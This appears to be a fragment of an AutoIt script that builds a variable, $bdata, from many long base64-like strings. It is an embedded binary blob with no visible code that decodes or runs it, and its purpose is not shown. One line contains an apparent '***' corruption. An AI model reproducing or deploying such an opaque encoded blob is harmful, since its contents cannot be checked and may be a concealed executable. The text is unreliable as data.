	$bdata &= "deVyOQC0R/Shz5pHF75Idcq8w3K6Ahoc+cVzhq0CbPE5WBwLl9VqtgZG/AVGeJQ+0gFGDWWfOESqV6OIWd3QanUBT4U0Rmd8EIreuRXBBLiGKfJJNZBWQ40zLm6HYfSMg5YVRkW6AQvZd4ixxg4OVutOtZ4CjOPCu2QddBV8bAJjdmuAVxf+y2V2NI19/marSib9WopCZvCITQluaUwEsl/Ur3CgpYAJvQRNAsj89CSzBAUXWCgW8E30zxD+WWguSMg8CHjY0oWxhq5axxEqDriihhFs7BKX+GwIURTqPA3SK/AB84RIg+AI1QLtuN038YlBpkC0Tzz+nxCqUMUZUJYuMzvCK7WxUREBa6B9dREQRPA5X9gNjYp0IseVrJp7rgHzlUrqCNFA9kQ6Wo5S3UoWigD230e9Ukb6ZorxitAm/cumaVQGwNBGdBiKFjrT9tYYKrDJC1SK8EaKGiNdQmhEwtoY7I8KTU6zr1Ng1DB1MfCN5ymIt"
	$bdata &= "FhyUAz96IvafMpgAHNUy6aZ4nS5JxToAlPUnbxwLy2BWNb8MNKeYCDQGBxSQ4DdcOkIRofDJ1AA7SAVzugxidTBCR4PrqYItUYl57scZqdTEoom4t62Xf0Z1tXwxkX+AJIVWWw4Ae6mLPz9AEGiTVX4lYACAnxR8AQ4WIBRaVHrWhYspl9RHWIddAZa5gta8CqhJvmGZfgLwVVh/YmX4VvVFtgnUvpr3IqNSJ86nI5GCeLg21E7TY7VtHvgf5CBmM5xez4gSe0JOGb3PgdAmt7JIn6DF7M4pqR+FokvStqOwWYEQXXaqJAIHRLQKZxH8MTPf1J61IuhiXUSyoE43d0W29LRLj2SkjSWeQwv3YWXUld1L1+Tjc1wYIk4rcdUy4T5Ijy+Gho5O0UI45PA3Wgz683QAh0F1XLq2iqCMxJ08LthgRwUpkFyDApadwYb0NQEgFIIxjkwengnUGiVDr+8bmAzD8pq/wpSrBlhB6UBRBKOoXWsEs"
	$bdata &= "51FxvuUdL7hwBv3g/ukowvE5cmU3QCICOxaItcsAdN/HI6jUQJCLd3E2uw9oSTi8R+HJa+TRVhzMxkEZ3gYJYE1yQrsSCgAnbkq9Sq9WYDCDkEdd8sDA6eDIHBXpHgYVAC+Fn0XSNxQUxtE+fU8gqq5ycu8OTTKlXG34DhUzoKjboIA6xlqscgU2rWx2rgBu4e74dTVYAgcUrp0dJbC/gTMXDROlTcPcxL+R58pt0UJDgdFDpVSTLo72C8IhzRUpusLbT9C1p0UWaBEn8CMxyNJnTQoalcjPqVUEsaxYiWsydKEBt0a/17H4kGIOmeN0rwf3UsqUB0mETojiWR2d0/kx7rzIO46yIt8rYc+t3rJaN0sN3Y2y00l5Bjh425VoGpPbRgQ1qHByQACe7Qt4dAD65ceDrYtRuNJYAfID0JdQ+KZr1DClg+P41kvX1QBWxaRh41kH90MnpVGYh3BRzS2cmDgwtFGt3qSX4ULZXmVokUDDpQc3g"
	$bdata &= "wOIN3geEtRJkFzoSqE3KdAPRwROldP20hAFekN20qINyED4DhslPZ8XgMV91JjID5cgLZ4Dk5xnUYEW8vOLri83UGb0uOORzLLFo/L6g0lgjmFpoDQesz8pr3w97B5evFJA7wHgeiDSyhtYwGJdLGotBZC5B5t8HeAJXQJVuB4j9oxPdFPd8GC0B1uPK7HV6SbkB0i8yASVx+F3Y3m91xdSvn0lndYQjdAatnL9AQdA51xXT/OI2SwtxXAbHh/veMCYdDli5c/gBWHgr/f3Q9NE6KbEYC2hs8wO0H9yIXl8M+fI8Wed4AhM10QLgCn9nUwU6z7iLGESo9Ku39XiYsEdnBjyyE2la0tMnOnAN9Q9dvXYT8YLEAm9/gnsjcm8jat7sw/sEr3tknAhrDbCRpB7UfNlvDqB9Eul8nU+rGUDda4KX3wgMDyGgAX4pm8fRM9jrLdM/0uCkKC/G37yQiw8HjEFYQiwq///7+fi6xcAUg9zPLQnT/"
	$bdata &= "o/1dLIPw/zPPM8ZwBIgBAYF1HCW1Q1B2DXTTwoHm4zEUei/Ent5C/P47RXWWNujvOuN0J4TkdOfP8zylqiQV3AbUyLsT2OuWWmdC/m4M/Wh3DM78ptxAcxUIIBywd5PqpcLT4Kpq7NPEiyQf0+LDysM/IpWbD63Q0+rCM9LogoGJsVI7HITCkYgiqg4kbG1jSL8rPJZaIJCJLKav5Gy76Vtdjt3AJaU++55qBHw7EqRLMOvewsxMPVhophCRWpowbHJ4Y2NdvudYS+PgwoCJepMIup8yfKyoi1oSMNKGnrLO7+5VuhUisC20iQ0KuIk9HS78BNysTtpcc1tD+FCBnb8SLep79KCoMFm7fDm9yUSfKfc9MlweOIiNWtgm4FJHArrUqsHzbR/NN88efCAQNVwXkIN3cD68YOWgBWaQ192B0F9aKNpm68ldNTk98blH3S8PjvSADRcj5Hu7tSX/Ymp2dXthy90z8MEv62riWSF4kVIP1mgUc"
	$bdata &= "AGXB9AduIaSqZSGB4aUFtDSUGkU1jUUYQBZVhvnTrOACxtpDlywCo36GOsOH6CD5ToHVxdabI2pVpZhRHjkAIZ1+YvyCvDYcOM46kA5Faw1cXqLhOTWFqwtQpz+SC6hSwvN28iVRO4IU1t3LQ0gfvkikGYAfZhZi9skg4CEqHsDE+9P/r4emQvUGqAndJzdDctfpQYipvzV0PvCCmImn2gDIdFCYo2mdP9VrHoZn0odDkYJULB9xG/QO2QaZeg/yxhhp/9aQMJYnWxBf5QmUPZWrzpbYge9N7IQ1WoIWb7cSEeEPEBRWQW2MWryX1he9oAbEA0+dCV***GFnKURIA9gxQvjR+C1TMZQZFo7BAmviVpkBtEJASd+0OgDWBgpAeCGmFYOXanDaEpj0WVUa8EmSAZF7N2mtQppV0kT4n1PUSbwwekQCEh7QBzsOl8IrOvzBTwT7cATV+tQ3vYrhy4D+BrR+Eif98FIeE0Ab4rw7AAP+PhOIX"
	$bdata &= "XvBQHfLnCDWQ2LAboO2B7w7gPQ2MJeBKnFBrwuCob8cjJk8MG11ySp0poTDDAC682HtDs1LssrwcMS/v2BwMkh/MwGJjJ842+fLhD4tGwGjSvg+RMXzzj8uORW6PBYZG/SHAF+ojQc0oTw5D8qoHYCGXMEzYLQ9tt/BVJBg/ktcvGNSO0OEXcMag1YXiwIv381BMMFRJJqDll8OjbxFCOsw0Kbpo52gfQGNtFowyVsANiKeAz7Xz2uB2hPB4kIRbiWtl4CuTCuQwULCK+p8MkSGh0vkXwAS8jPlXoH0XAMlSW0q4A3yG5rWBaVeBYd5I7BVmiBBnud3jeV1olf7Vkhy1D0PkGqzEJBwxGAqoYjdRQLUTfo180CusYEOzZy715t4wjjaX488hwN3Q7YPtEMcusgPMjCwyDOaE5gxK1WTqGORjdGDrTahu5FMvJsRMY5NW/ZcI3wdNuLDWEId4bbaeHOlM4aaA8CAwPOz1u/dN8H3iZZDAI"
	$bdata &= "8BugJ0BS9gA/6UodULHCV3baEOeW+NjWhq5Bevww0DMdAcFlzD//3ksCQ0+hDWPS4iLEb+hLVPCGB60FLFSskUBiUD312ELVLSyuGIvTbQ0DFer77Duh0fokP5IpFEKLghHWBURqBW2PyrMcRHmlFysIEmkycSOYmfCHgnx4UO3Xkchue8Is+bJJwCE74suVX8mzwIp/r2tf4uOyGlsq3OlkeBwD80IPUaXNiRBEo+FKheB/o/0tgE0oobDdgPXQIMUHOGWTCto9hd4Nj34CXHVYpfksfgYmteAVAd9n9ghdII59DKgtArW5lPiA6BS+/BmF0RqAgXfEko8sA5APIN5bDGrgZ5D0Y0DgavgMwdYhP2Dzuig6ICkAO6QCuyxjPgYlltK4I3XX2BUMP7r9eJSCAIjpGsxNaVaqa/Q4gqK4g97JkTHkNVQGDCDuBleytQGMlWCGk3tQqDL7G5RU7iSMjs80NmEm5FFfoa2hKXFNqIDAEaDYg"
	$bdata &= "w7f/izA7MXR8D7YwBBkr83QVElO/fxfin8ONXBv/i/MUhWkERg7Y9rJwAQZZAUFIAmfkAHkCJwOS1kCeAxEjgTrtwUgC0gHyPNFxBHiaBAQ5QN7l2QMFQAW4kQPkGQYGlyqPkIMHHgdyAwgHyHNpCAgISXKAPCMJCSgjB8gzCgoHC1N5hDwL4gIMeYC8SwwMmgy5AkYOkHcNQA2YDmDkAHkOdw80lyPkHg9SEBAjB+ytWRBgEJspEWHkgD0RQQgSnssD5D4S5wETE6WpPELCARQUGzlA3hSaFJkVQDwjB8gVeBYWwTNygFcXFx80lwtJMhgYIwfIuxiaGAkZ5/IAeUAZ6AAaDkYOkBrHGx4bu6k8QqIAHBx0clh1YyTPHBymfXkGkOc4HR1gHp6DAeQeQwYfH0zjv0B1IgPCA8orCREF3TQPg4ZKAdquMp7Pg/9ih9p/Z+BbK70ABHmKSWwni1DkO1GvPG/t5HRxmvLaUeQr8tLCjVQSQ"
	$bdata &= "N7zNPLV5TjlBpDnGbjm5pswjOR55+dXU7C2heIE6LaQN3LodH3okBVOHCDvnU6Y6UDpLcgB8ozq6gyVR8jB6xzr5/7sPGCDNOzsmb/+IwfIu+1A7Z7uMHKAPO5975rLEXIc71jw8EYOkEHwMPFn5AB58Q/yeS4PkPLu/fPzp6byCMn99PTRRg7YMwpg9Jug9c/IAXv1QX/29jyMHCBe9zz3SFN5hDn9+Pi8kf8/Azb4mRH5QPnIc3mA8Pz6+iEHIwfP+xz7jdxUHqr8/Px0b/xeg7DkVg+8Noz98zxT8jT9G/7+nkQcyBN0lh2bnzcLAED/Sf8rwcmFwMGNp8YQzUwJwT6KCiBNw6tbpnmAJuPj3uUBweOj/fvkQORbFTlA3PFBGK4iV7v5J0EKKo+W++cc53GNHLDnmW7oAZa8SB5N+yz70lyGCB0H6+vr8oAN65nf+uzkRfKIAb76nfpTOUSwHXj675EDNkjv75lQF8kjrvABL/oO5R"
	$bdata &= "DBkvod6fkP2CBN8/PzmcH5coFcLf5R+YhryVD53V6XpnJa+ff39x/iGjlgmzH4ASx5kTwQ+e/40lQOMT3K+Pv7b+SADfuZovxA/O2KHCCBDQRfkatBYBkd6Hx9RztJSSRA4HqJQMT8LUEKpsK/4mDicV0esOLd8ffjWZa8SB7Q96/3CiqHGH+K9+Yc5o0csEHmmWLnvEgecVlB9yD3KocIlh379uoOcWFp6nHT9pE84lpZsvYMESx5kfYdbMSFpbnu7nHyiGs5RPZZI/ZEsORFAvYdC0tTOd318vIR13KIcbX1WWvJi+SU9XP1l6ZyiBdO9fb29tc5YF55myVZQJ7ZQQRB+Phi8Lo84/T5YT2Fpak8vvT6+ohrOcRxlvRZsORF8nX0VPRgwTNEHS9mHv5mT68dlCBK9Pd9UXCBC2Y7Htb7n2FvwGVgNBVwF1A9l6ao4eHh4f884rpM8+KDr/MxLHmRjvOpwtJUDmnz5eXEtRzi80Hzg1j"
	$bdata &= "yInkg8//ypakcIh3a8unpIjnEjfWy8ix50XWR8oNw8qW5DBEdS+3tIjnEjfUj8ix50XUC8oPh8XRUDhEdvPHxePE8QLqx9nCT8bzoOpFy8YVR8SqHGJY9LPH1DnFjafX1BPEXlpxI4/DdBcGSU8LwHW4sTeWd8Pn59a4TySF18FTwg4hgyYsz8B1IvtZ1DvCLJN3AF57xhMo2wmkAEKtB0nXuwxrkuxIWK8LnwMIB+zrq1u0PQT5WAUEcIM/IzAICq5KG2IwDTgN6CLQI8SR7koIXMhEREXVoCfYJjrY5SwFOAuuejxrfkaEgTgHqeN2N1zwHBVoACSGzfZaOcZJsKQZwG2w222Z0J3hIHmusb4xzmDzP5tl3uR1u/Agqm83m2WqNbXJ5dppp/s/zbDZt3nHqC29PPG+zPVsGdXxo4MbAzOF5nvftHl0xPV3IAdpomTFkZA0C37OBJmAB363Xvgm41XamHuvKi1WC0xX+rVvE0dD/NnUP"
	$bdata &= "igqICEBCPLZpArAe6xkdCE9w16ogOE1u7nkCiBgOwVwT5otnYgYVYB/+alCIXAb/WFR6IZgR1jNIA4KDV3xa6kr6x2wZ5HNSi/BR/Ur6LjD5BY08jUyLD4M8sLXQaTA2y6ABsUC0FW7MHuxeLArtEEj2SFRq9OsIozHQ3Aj16wP211SIRdpNGBwG5OsWAYSRmUsJPfRSZByghHmeT77c/ls7DVOL8cHB+IUtFFlfBwPGFAHBL3g1Bjj/dDANdR0rywAJXiBNSUmDDOw6FBwIKgGJGCBD4AKF495aCD6CFy9TRMP5G3YGU3wiNRqLyIPgNnj5sMA4MIsMA8EtdST01gzMrTCl28RGSxOh2ACRHFLP1nbf+MfQwQkexov34QM019rwpoT8Gc5sbTi+4moKo138vxBg7x8aaKAPNukFQE5utl7CWVnWgv9GCF3Q4wTTfL+gdP01Db8duYPnlv8EtY1EOAzqU4ZwtWPrDdI3DsuFSUsFByDLb"
	$bdata &= "gEVlInEdCDMdoObgSTc3GoLS+8rqEEAGwjtfnonTKN9WxcE2HWGiQuQD41B572HcSnLpdq/f6SAnqDgOCNAHr6OAQrSnCz2RqpcEIaOkJE5BTV8DwAZJxwNWQdFcwXc+hAOJnACRX29/5ZhpqQXuow+22WdqXQbGXSDxjj6fiOoEjBc4Pth5sYn+ADhTHLGKzGZaqD4APE4Wff5DAXcsnfTp4EUeUfpxB40YEmQAI0EgA/7fsVhjQxpiYRpxx+shLCBwrPCcxfGVkMZ2w6sCP8MBQpJwwR/BsZo693B53am4EEqnhfPg+FgycZECLC21aIWV6UoQeQRAnDhV36AsMwROQvBeBpEtAA3MvAMSrjJFkqAwyAD3fs680AUy4AmgBEQrW7hAlNYFBZCtvi4C19QWY634ABk19YFVOoQGry1LmgIIeq56cN6UgwKFL0YjgA0DLLC6UMzvAaKerk2ZgGcIcdIK50MxsMFvy2ANjACBAqNVAIkgC"
	$bdata &= "KaCRRs2h7QECB/BdMhQwrhf3Ykvo0edvF2u9Zm/zmQh/sodRuwbs6NKhLu2o7+/XzIWekqDU+1Q0AQXoIImEuzkFqGTQzPLIItkB9OMIFA52rCy5szCXGwubbkbnwIgXIxvgO1YQcy+gUR/2BQS8JyHP//LwKYI8Z01esBQYA5IHT6igE8YXQMPHJEfBT+dBg8dw+Fe5wCW9Y7hAu8fQwLkBjw62gIFFJVXu8wav3m1hyJYlgIC3RCN3QRSHQrkXBa0xkXBnRA+tufW9Yrz+svO9d1HpJCgSrvp4zj7OsgHA/LaGNgOEYEwv4pGfQgCYPj/CR0WIJD2EEU0JUEGI0QMWrFFYAxiLrlTDJDy48m3AAY8Hi5Gp0Yf/8dTDgEfAYWuD6hOBU9UxC5gUmEYiW1yNOoo3qWBpkLuH2m/hw34YAfd1/OfggroB0QZFcqG+GW9bxnAZ+oz11ZcNIo8rEuF/50Ih80lHCK2zdZGQMGgd3x1+4H10i"
	$bdata &= "KSIjh/YgKV47JJ1/1M8B9CFe9eVgImRxqu4HYQ2DswF00IDZbJ9gbuoZu3wx0JJgfFtTGg+zMH1si8i+mpU0IO8902lMu3GW6EHfN/qkKjBRiEE029JiTZ4hp+Pi/YwELAOCB4ZwO+cfUdC9vKA+MrwBXykA6plg2i4qrBGNXQCvfAdiizpT+6087XfhyT1gg4ZA4TQR9fwSNbcBudAlz+Cv6uI+Icn0rBUbZfiymdrRbYaqLz2bIAVIq2BZAK9kYclBs9BJYED28/Mh4MWWnSYUp/yYEykg5sL58f7fUM4BjFEE3Ku2SnWKCkQwjafmAakrrYdjSJ2VDTKRsJFJzGFQqxuEggoIcdUcUDSFgoq2CfLbPwEUHhOvGZ21MKo3VEPgiaUnnV+/DAd6G2Y7pWoVtR7BwsH5bdNKGcskVfdVW71ZWkwm5HDxWB4eRqv32QCR/dYOJire0W0A6AXghUliC7KmaSkuPhRhHtcIQhmtLrgFZAOAT"
	$bdata &= "mR7QMkhL/QKnQV5nhXYS5DlN4B4idX3iSFkmdxi3dPdSutCOC0IMZpNaXQyPOny2BW2G9AxKD52J1cTdIB2lEMd72ov+zDBYIMJzcM2qlFzDhDBDJFwbGCyg0UiNMSAYJZclKlIhgtfXdBvLiDC1Bow5BHQe1Q36NyY3/08EeAqLD9RBiQ/coRAWVle3dthmY+RgoTJq3hQPu3Vl6xHgiDAiPAp1xIqhqfgwiBgfhprgSGByAw/cGA1vC5EEyIDhA/6AEnJdJOY/Zql8ROmCkJDCPiRC1R9SfixXUOUANqYWWo95D7I6poQUjAc/t4FbEmRwPkFISeiJBneO678+4QmpqVlew7t0GeBCMM2vRpc9TfLFw0iWtZDcyvQxZCO+P2oUPnc4kgoxjnoBU8SNBBi9USAPjYJoIt4gfBsCk6UGBrC2AuEyWoYA0FL+KMgE+xm6rFpzU5tPtEWLi0jSPGJrw3AvOVWCgYdn7VL68KkehusZRhQ+A"
	$bdata &= "vDvftp0DzV1AwlF3OogiEtG64TJ+rsSaOCd/zSwnIYmyu3Aw+2IesBaPEVKFrxkSpiOcPMBd2BYYzgCkQhL1NRgFTMAG+BeSg6IzLeACIxBBH+Q8WNDGFC0wH0UR1Da8AJUvPfa8s6IlljTHDYckj2TDBgcGC4U4HrQfxh/+zUCsAThEA7T60EW+39nujNUJ9Hr0dnR6tHYC9t19D6buQnA8Cgci8ik5gM08fv30XIOO053CHIHO1Z2AU6NktmXRk91B9jgYFurqUYIlBA5jkM6S647EDAxDLxw6TDN1Eqahizf9bT+ClOLvZagMq8myhQCfMl49EvGm8LsU4oeUn4Bpid0IVEXeMBnQqgQhFBX7ESboOUQi5FEBELOoP/WoA2KH0frx4D7LXU5mmoBDBgCnBQrKAkg1NIouCz9G7kcjEkBQBEkD483m0lsP7EqUDB0SBQKr/L9PzSKBzx4dA08WCUIIRAQz0jCKgpsHlx1MOhuvg5LBH"
	$bdata &= "UER8WxHQC4hVw3SGBtagXmDE7aFLBeZSrLg+kwFKpfJTBodjGKy4DpYZaDv8q+GSx3AzAswck7TRRzGWIS723HCDmAcieeO8p2IRwEDKySGsMjAk+oZODICbQbUn2FCAXlhyT+9AYGfK9dFAPZiO+MqAS+VGShsaEbUj40HiUlftj8Fxcd/J53CcQshPx2JzteUE8SYg90bA0WgF2WiiIkAjLwty0zA8Z2jQz0KxC1OFSOIGJQ2AP3wn3oohj22hhHMLNbMRzIKU0MRI5xG8DYk5zh+fFPpN2Q6wFQKImWXQC4GF9bd4AxXRYwlRzE31MSzALuVzhJMIkNFIZz/JcAsSXsbkCfAl5VdTeMhGQQaFixgFOtmvDgBKvNaxgKYFciUkRf+UumVUFjhpHrC/GhEjMFSfy2qIKZMuGNQmJfDfpPmGMm0zgYdEtXNuv/pD6pKIr6hRc6EEnYjm+yilEBOlBqFI0OyJaG0CINgixP08y+0EE4GXX"
	$bdata &= "UBi5aCDEF9jK0u0CICXW3IM10Ul9QgZk5VTA5jI2vSkxIBiJ5jhp1kOQByI1lhgALUqoIltUkCL/K9IpVFMYdJDI6mdCRElxBdNUzrVAEQSOY0IvAT610orFrhJYC/QTLbMwsxhQGjj0pCmklj9Ill6AAA04U1Y+uiBqIobfOCeTRh0QsxWvNIGDCEB3oNNZA5hUSkCYClVPrj5xP5yPpgkAPqDJNBARoNTSBVECgLYuDicADpBULWkTAbtrrwovE90puXQqN/gPqg1IyCvgAAoaIqSKbyggbZXz7kh4UmQm4IrQQwokmu5J0M3zG0Gy4D4dJ0way/pIMgfm8GjuQsIKyVB58BWz8qa+MfkaZagyMypkB1wz2X1BPEBFV8DvLfQ6Cjh7/IGd3kJqD/3KeqqXEc0C2ovcB6QF3mbiiA9y1at/UUwsJzV5g8JkGmkXADuP7R/RM3AvCu5BKdRNIFwC2u2Q8Oi907JCgpB6EZowGCvDeHNGe"
	$bdata &= "BhZAwzcN2H4INNDsUDyDkMZ1UA3gdQVVVlkAGzC+fxS/7FEFK7RTE6F94ZmEdfqITNg7uwHADHJHDJnh4AMi8rx3Nx4TwlYqQywEK5Z2B6QbaG2YYPCK25kNTGY3MiyFA1IcG/hvShNF6F5WgevfYzwbwOGpCHRD+hcauAMu2plWZDwT0zU7x/8/BB4rBCgkVsOIbZouKwcpJtSDBW9IrnR/8DTFeRD4xpwQLVktaR7GCrOpNPywMFNyjYuFrAUtVsiGvKZVWWjKknRKAGm3fyjGfwd9MdbYfixU+IvLM3frDSNzBUqSEDv1LlBNVQkiuPOl6xkSPR6D6AvMS7zkRGN0KQXWKmmPtPMCCCyYCCg8q2GSrvtBXnF0nBio75T2cCS6gGFsmTfak4Db6ul0KsDte9kLiwt/EnwOz3MMF8J4hEPrJhR8KH9MtF9LKG9Ak3a/9WgicDC3JeVhtUnD7PQ1nAWktu01fxb/wQ8wixt8bhL7gPQDA"
	$bdata &= "HZkGdDCHRy2nRvKVlHmB9H+wKc7x30k9Cnj1oRQp51vJYiwNRQcQWvNyBU29JkpGVZrgzDKwCUBaZ8dObZG89ylCHQzjoECj510KFQOwt2KgVwrOAYS2CvZvbfHRvob0dqX6xQvDwSC11IGZl5Wi9EEsKujV1BTDb5inXl9I1TAPIPDxBcaNj2jNj1AU9P+cFe2sNs2OhPKLlFTem0wfQ2HDM3WbxxxCBiRpjIhCBjocMFDmggYO9ecfCt/8J+M+uR2G8LUB5lf9/8BRrRNAO5WGAoccTO/H1tMf/Vh70iNRAhOvZ1Cd1v3+0yixlZ/0oHBYkHbWdlm2B//Zg9U2WAwJhALumvARAZeG4MOEX5IwGiq7y8wwD2AgPC6CM8FEj9S9jkIdRrIKW1PSgRROPDQWzQRUoED74n0laBD0OvFtZ2kJNAGfrsl6hmkBTyLAhHYbrvcLgqyJjphECUKNe8HknRqQQJ1GSgRAwySClI6KgaC3wncNH"
	$bdata &= "XSi6LDkBvA0eCYdn6Q2gHDhgG2GIoCeivtqaDn3GjcLgKkZj2Vp7uLML/OxsW9qXxTuEoC64heWCi+EWgupPYY0ZABVnR9gL4EM5dFsD5ts53pCYzsFXpZRQLZtQNLI2qIC42E7l1fWZWAXXyJdXgadGaMlUNms71sDI2UXXAGRWxlaOm+kPRtZJyPmbWs6gxHIpzqC2WM3t3EFvwCibWQPUD8alANtCTRLox3gPuGdJsjFKsQrTUbb9hqYICyQOiMItQ3sNQKN2TCE9DhA/RgagMAWcztoSTLbGFvByNUR2rXZBMSDSfDUVd7gKMBsJ4c/SaAggPAmDruIeu33nLxCA+Dd26V27ky6AVPSyqQMSFabuBbwA0xMBjSG0YwR5j8SeCaiTIouxSs2/g+zlO9RPhVnb0gBAq92b670SFtRg8RDMYgEBW7Bz1Yw+wmjxBoSMC1h/tMVoMPxiMVljuHo4lnf8hKWXY4GYPuO7oGaZMCA7kaDIk"
	$bdata &= "MD1oHhlk/DAKBURSr6A2ywe4lME8IU1VixSvW4QD/NEecQyP9vtdoEPSMmuBGBU2ODrgh4uIzavQp3IRFiw0mJYMCdCCwzmaCgY2h/zb4RKK9x1AQVaNdvAYDSnP1dBXhFcI17R8fFmiN1mzA4wl1WQHBCkO7onDBaEC+enwJOIKO1u6prYuEd5gFWX4E7kJXU4TUPyNvcDwD8GY5XgZ1+M0mbnwwGHYjVxVErxVlSJ0xDjQGGS8ShEMcO9hy4xFQgUvo+J745weJH5LvVMJSI2nlAighoRCVIVn2EhdQOSzhDOkHMIBa6ybUkUIa4+8jCe3eEzAeQhrvTFZ0TQBDtwqJidRcshsILmKH1lbH7fzeCrlKXDMK2kayku1OUrNWwTQb4wEIzJYQIkFKOgIHVSsWzkp68jcYgw1fP+xNE4lUExAvgFBeYBMUn5Zb4KGAAit7MF5CMRQgei4YYWi0AIyJfqUvi4akAJYmzn1Kwodn/9NN6Ha6"
	$bdata &= "0ytcH/xqcMaGDYCzHb5DDEsBts0MGWE6t6gPEOmA+D2W314rWJSd3YgW/3brJBuhbOLlLZud37gbM0UMAVdDGEofSjWL+IFWKH0Q8m9OkQWh9OEjzDqJCCWVjCaLChBFBgnSyRLWBs13BgI9A8HLeicgfAzcyVkux3gAPYrAKCnrjdS1JK0LHMiBtBosNDyBHMiBREhreMziXD05IWoNmUzhkNR+aPxXg8ISQp9o9cVrWJpYV6WdQQvnfcoIxXZsJOAdVED3s1k7PSWYtevXFH/csFSGAfk5NInj7U1NYLDZxlP4XpPO4h9HFwyuOoOFHft0TI11JmJNb2rNEiPDgwCFoqxeOm8PkwhHdJw1X8EJkC9oUCs6w1eZzYCx9BvZjMPZx2UAp5uMV75cZgvcD4BXo4wZdBC9gbmMbBRyQgCr0nL3dxgnGHQWkA0RwQMD5hSSJKGTwfbunoUTEMcFcfhziXkwHITed/GjpDqiYHffzR8wlyEbu"
	$bdata &= "9lisdkBvnkrDCdBox+WyrQvnxAfGBQeOjyXINn3TbBl2LDthkScOaGFQq6mLwVQdEhbNBlWAhkbfBO4wQ/PXsPv7wsbASTDAr8SKIM89aBc31K4+wF1Ho0EE1iJOPH/MIPHGEYPWArzGwy2cVcQiCR80p7i0dL7zCRTxvEk5P4MnYBWviPGwyJ2n3QTliKdyOW06LeDJsa8N7OMxnhE03h83FMzd68skwlTdQNQPzLwaE3ma4BPwf0WNMVVl5oLOLN5eCitR6FetoTEVkylESeEN03pwREaNFk5hrrBj37H625qqQWvWR5wkEapCLWYUYUPX7cTHnUsEVewtuqI/RdXa05Vf4KyC4k+642guhYL4xRz+Q0iwQmvVo2xwMFa+NATUKvGJiIUOW4RF3jCCGgi3mgo1ACBCCdS3BbER0Q0dQG1gyUymnJ3Ar4NKzAAMyOllBB41vTNt7MjYCtAQEBUIzChcZ6oIHBryRTWEjoJhsmQUJBWRT"
	$bdata &= "v2RHIQwBEhJLVUcuof4RcCflpBEH/+K3kFLVwF8PzB79RjCo9xackEiowBDmMk/EG6Dkn2wcZESn8uSDBTjRwxEbZt37hV9ItW/Ar4ixD2wjrQwP9XPHTB+gRKg/o/dgNqP1rUVtFy+jx1Qh4gg///76uAcxmLytPrjUwCBPfTIVy4RP4JdSMA5d3H/iEZ6xyNSuAznLjEWjgGVvBoYFkE0FNMWxAzrcJq/ANwWiJVCn6wB/ZSCIkuJovR6134g+P2+zULVF30j44rdfgiwfsENFn7NwqgS1473nYCi96O+GsaTOndO9aAItawXr4pOJKKcWZxO4P7IL7BH/xfF4vL0+731iF0XkwDBHUhKfIdfL8x6xqNS+AvtFs1Bnsk65l+i9CJThe9JEwzBAgs6wMcTwJuMtgK354pwt43WvCNDNGLmPesnVlIXgpaTgoIh3/YFBBOYIooiE0P/sGK0ByQvogWcyWyfg54n+HBlKdq6AkZFx2+F3y"
	$bdata &= "7RE4JGOspSRCsB1+erUvGHrrqjYRvW4bCqAlYgqKDMjQcMIpUCAEenwxLodkXiB/mGNinRCMBwrGwbGiewRWSBrbaSAyuejLWhfftZT9ltwlQCB0P6565BjmDpIjZACv+SEPCYONnFUgQgHlDvqOoVyFw/iM8nnmJev91ZVNntCXRYJDQEhAlyR0bfR4TeIsV2yvIeBH2xkoSyEgUFfZ87mdeEreEVTsFV+/p6aZ2iG0IFDd/QqOdlQx2L4k9RQE5QONP3QhKaBDwdTTAbMAtJt7ouoBbEG5rNMskSAy3ZP9r1Z/5NKP19l9oxEGsI0oIyAgjWuIQwsdSIG5CJuW7KlczOIDBfmAHvs0w65uDToImcA0BX//T/H540RAR8IYNCFffGYUxdcd27HFwM9vCA8BDkB8pX335i8NpwIeEMPpF+FpgdVDtiUAIBARQSvNUdBhQ0PueEOcuYoFyeQxoFfcIxcI/piyNlwBwSPpN4TtWOndDwivP"
	$bdata &= "wekM4CJA2mxBg0qDiOzhfbl+hI2QLEoQDu+TxN0gckD88BxQ3XX35oDoEBkFz0l1y3As4WP8zPgFZI1PDHhTYP5UQQiNSixBZJ5EABZ9jxfivJ5bikZDisjshMArhF8Akk5DwHgEgvFXH8Eg6vfSIVBpZAKkZ5MMUwBXimn+ENcrUQIspPmaF8HqymrRwE3AT/wCSTvx7gtD9u6LHyIwD45VOoCaVITMBkWOacmYu0A7uwz/6xLswfkESYP5hGp2BpsCfA2SWQ6LX7ZfQ4MpQKeT+RrH+LgBrH2kcpAmH4PB4DnuvZACvpBPCJqJEQ9YamgEfxJ5WB4G1MIrzl48/cusCiylCRKUwf8ETwE2EQAOjjH81QEiEaZf8JrZ6zDc+Ft/EAp+S5qmabqCWUtZWVdpnudpBxP/BxzgCkilE89whXS9TWYi6yA3cE+BUN3BhGksx1ztcAJ6MmwyfpyAgMDmsqoi0WwVBRyJQiAo+MM7EfV4qdQNC"
	$bdata &= "w+NL464tVeBjimyTkJLbFwz/MNdBLBS5E6D/q4wY4MzMialXvYWm7Rj2hk8/DGDfODDODtPmP7OcWAYNnQG3w6ZYAOGyk4G2dQHtA7o33fRdxBP1mMwawcSA9qJCuHnhx2+To0M8Yt5lYl7v0sEz/OQCKusBg/+clm5PAYPzr/vG5zKpTnODzI5YckxXHmtTlANwQho7BgBUjSyPr1vlC4B7jBoGLYFeqTCO6gXg+HwNDZTSSHA/D8MVld9C4PO/9Pug7BFwMNG6OQz9qax8ABXQA3j2RJY+m1BU4w7IyIj/gvXdQrZK0APZOxy6AwB5opMOB2xR+7d9JHZ2XVb66h7CAArJvZOXpdm8HIxCTdj2S3imfAVTqR7AM5l3SJFq+6fKRh+LqUrWZa+QxDb6x4ZFOWJiTwaix76/6HDAl7ejIygG2z4P4t8iCNNH891KRA0zODNbUi0OU/WWkfEDnqRauyqeu3A6+fS70yOBnDbu8AjznUSsa"
